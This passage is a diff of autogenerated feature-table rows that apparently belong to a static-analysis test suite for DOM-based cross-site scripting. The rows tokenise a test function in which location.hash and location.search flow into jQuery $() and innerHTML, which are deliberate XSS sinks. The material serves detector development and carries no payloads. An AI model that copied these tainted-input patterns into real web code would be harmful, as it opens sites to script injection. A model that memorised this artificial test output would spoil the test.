    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:24:5:24:14 | hash.slice | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:24:5:24:14 | hash.slice | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:24:5:24:17 | exceptional return of hash.slice(1) | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:24:5:24:17 | exceptional return of hash.slice(1) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jquery.js:24:5:24:17 | exceptional return of hash.slice(1) | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:24:5:24:17 | exceptional return of hash.slice(1) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:24:5:24:17 | exceptional return of hash.slice(1) | fileImports | | | autogenerated/Xss/DomBasedXss/jquery.js:24:5:24:17 | hash.slice(1) | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/jquery.js:24:5:24:17 | hash.slice(1) | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/jquery.js:24:5:24:17 | hash.slice(1) | contextFunctionInterfaces | test() | @@ -13987,6 +102896,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/jquery.js:24:5:24:17 | hash.slice(1) | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | | autogenerated/Xss/DomBasedXss/jquery.js:24:5:24:17 | hash.slice(1) | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/jquery.js:24:5:24:17 | hash.slice(1) | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:24:10:24:14 | slice | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:24:10:24:14 | slice | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:24:10:24:14 | slice | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:24:10:24:14 | slice | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:24:10:24:14 | slice | fileImports | | | autogenerated/Xss/DomBasedXss/jquery.js:24:16:24:16 | 1 | CalleeFlexibleAccessPath | hash.slice | | autogenerated/Xss/DomBasedXss/jquery.js:24:16:24:16 | 1 | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/jquery.js:24:16:24:16 | 1 | contextFunctionInterfaces | test() | @@ -13995,6 +102909,36 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/jquery.js:24:16:24:16 | 1 | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/jquery.js:24:16:24:16 | 1 | fileImports | | | autogenerated/Xss/DomBasedXss/jquery.js:24:16:24:16 | 1 | receiverName | hash | +| autogenerated/Xss/DomBasedXss/jquery.js:25:3:25:3 | $ | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:25:3:25:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:25:3:25:3 | $ | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:25:3:25:3 | $ | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:25:3:25:3 | $ | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:25:3:25:26 | $(hash. ... 0, 10)) | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:25:3:25:26 | $(hash. ... 0, 10)) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:25:3:25:26 | $(hash. ... 0, 10)) | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:25:3:25:26 | $(hash. ... 0, 10)) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:25:3:25:26 | $(hash. ... 0, 10)) | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:25:3:25:26 | exceptional return of $(hash. ... 0, 10)) | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:25:3:25:26 | exceptional return of $(hash. ... 0, 10)) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jquery.js:25:3:25:26 | exceptional return of $(hash. ... 0, 10)) | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:25:3:25:26 | exceptional return of $(hash. ... 0, 10)) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:25:3:25:26 | exceptional return of $(hash. ... 0, 10)) | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:25:5:25:8 | hash | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:25:5:25:8 | hash | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:25:5:25:8 | hash | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:25:5:25:8 | hash | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:25:5:25:8 | hash | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:25:5:25:18 | hash.substring | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:25:5:25:18 | hash.substring | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:25:5:25:18 | hash.substring | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:25:5:25:18 | hash.substring | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:25:5:25:18 | hash.substring | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:25:5:25:25 | exceptional return of hash.su ... (0, 10) | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:25:5:25:25 | exceptional return of hash.su ... (0, 10) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jquery.js:25:5:25:25 | exceptional return of hash.su ... (0, 10) | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:25:5:25:25 | exceptional return of hash.su ... (0, 10) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:25:5:25:25 | exceptional return of hash.su ... (0, 10) | fileImports | | | autogenerated/Xss/DomBasedXss/jquery.js:25:5:25:25 | hash.su ... (0, 10) | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/jquery.js:25:5:25:25 | hash.su ... (0, 10) | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/jquery.js:25:5:25:25 | hash.su ... (0, 10) | contextFunctionInterfaces | test() | @@ -14002,6 +102946,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/jquery.js:25:5:25:25 | hash.su ... (0, 10) | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | | autogenerated/Xss/DomBasedXss/jquery.js:25:5:25:25 | hash.su ... (0, 10) | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/jquery.js:25:5:25:25 | hash.su ... (0, 10) | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:25:10:25:18 | substring | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:25:10:25:18 | substring | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:25:10:25:18 | substring | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:25:10:25:18 | substring | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:25:10:25:18 | substring | fileImports | | | autogenerated/Xss/DomBasedXss/jquery.js:25:20:25:20 | 0 | CalleeFlexibleAccessPath | hash.substring | | autogenerated/Xss/DomBasedXss/jquery.js:25:20:25:20 | 0 | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/jquery.js:25:20:25:20 | 0 | contextFunctionInterfaces | test() | @@ -14018,6 +102967,36 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/jquery.js:25:23:25:24 | 10 | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/jquery.js:25:23:25:24 | 10 | fileImports | | | autogenerated/Xss/DomBasedXss/jquery.js:25:23:25:24 | 10 | receiverName | hash | +| autogenerated/Xss/DomBasedXss/jquery.js:27:3:27:3 | $ | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:27:3:27:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:27:3:27:3 | $ | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:27:3:27:3 | $ | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:27:3:27:3 | $ | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:27:3:27:26 | $(hash. ... ', '')) | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:27:3:27:26 | $(hash. ... ', '')) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:27:3:27:26 | $(hash. ... ', '')) | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:27:3:27:26 | $(hash. ... ', '')) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:27:3:27:26 | $(hash. ... ', '')) | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:27:3:27:26 | exceptional return of $(hash. ... ', '')) | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:27:3:27:26 | exceptional return of $(hash. ... ', '')) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jquery.js:27:3:27:26 | exceptional return of $(hash. ... ', '')) | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:27:3:27:26 | exceptional return of $(hash. ... ', '')) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:27:3:27:26 | exceptional return of $(hash. ... ', '')) | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:27:5:27:8 | hash | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:27:5:27:8 | hash | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:27:5:27:8 | hash | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:27:5:27:8 | hash | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:27:5:27:8 | hash | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:27:5:27:16 | hash.replace | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:27:5:27:16 | hash.replace | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:27:5:27:16 | hash.replace | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:27:5:27:16 | hash.replace | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:27:5:27:16 | hash.replace | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:27:5:27:25 | exceptional return of hash.re ... #', '') | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:27:5:27:25 | exceptional return of hash.re ... #', '') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jquery.js:27:5:27:25 | exceptional return of hash.re ... #', '') | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:27:5:27:25 | exceptional return of hash.re ... #', '') | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:27:5:27:25 | exceptional return of hash.re ... #', '') | fileImports | | | autogenerated/Xss/DomBasedXss/jquery.js:27:5:27:25 | hash.re ... #', '') | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/jquery.js:27:5:27:25 | hash.re ... #', '') | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/jquery.js:27:5:27:25 | hash.re ... #', '') | contextFunctionInterfaces | test() | @@ -14025,6 +103004,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/jquery.js:27:5:27:25 | hash.re ... #', '') | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | | autogenerated/Xss/DomBasedXss/jquery.js:27:5:27:25 | hash.re ... #', '') | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/jquery.js:27:5:27:25 | hash.re ... #', '') | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:27:10:27:16 | replace | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:27:10:27:16 | replace | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:27:10:27:16 | replace | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:27:10:27:16 | replace | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:27:10:27:16 | replace | fileImports | | | autogenerated/Xss/DomBasedXss/jquery.js:27:18:27:20 | '#' | CalleeFlexibleAccessPath | hash.replace | | autogenerated/Xss/DomBasedXss/jquery.js:27:18:27:20 | '#' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/jquery.js:27:18:27:20 | '#' | contextFunctionInterfaces | test() | @@ -14041,6 +103025,46 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/jquery.js:27:23:27:24 | '' | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/jquery.js:27:23:27:24 | '' | fileImports | | | autogenerated/Xss/DomBasedXss/jquery.js:27:23:27:24 | '' | receiverName | hash | +| autogenerated/Xss/DomBasedXss/jquery.js:28:3:28:3 | $ | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:28:3:28:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:28:3:28:3 | $ | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:28:3:28:3 | $ | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:28:3:28:3 | $ | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:28:3:28:44 | $(windo ... ', '')) | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:28:3:28:44 | $(windo ... ', '')) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:28:3:28:44 | $(windo ... ', '')) | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:28:3:28:44 | $(windo ... ', '')) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:28:3:28:44 | $(windo ... ', '')) | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:28:3:28:44 | exceptional return of $(windo ... ', '')) | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:28:3:28:44 | exceptional return of $(windo ... ', '')) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jquery.js:28:3:28:44 | exceptional return of $(windo ... ', '')) | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:28:3:28:44 | exceptional return of $(windo ... ', '')) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:28:3:28:44 | exceptional return of $(windo ... ', '')) | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:28:5:28:10 | window | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:28:5:28:10 | window | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:28:5:28:10 | window | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:28:5:28:10 | window | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:28:5:28:10 | window | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:28:5:28:19 | window.location | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:28:5:28:19 | window.location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:28:5:28:19 | window.location | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:28:5:28:19 | window.location | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:28:5:28:19 | window.location | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:28:5:28:26 | window. ... .search | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:28:5:28:26 | window. ... .search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:28:5:28:26 | window. ... .search | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:28:5:28:26 | window. ... .search | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:28:5:28:26 | window. ... .search | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:28:5:28:34 | window. ... replace | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:28:5:28:34 | window. ... replace | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:28:5:28:34 | window. ... replace | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:28:5:28:34 | window. ... replace | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:28:5:28:34 | window. ... replace | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:28:5:28:43 | exceptional return of window. ... ?', '') | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:28:5:28:43 | exceptional return of window. ... ?', '') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jquery.js:28:5:28:43 | exceptional return of window. ... ?', '') | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
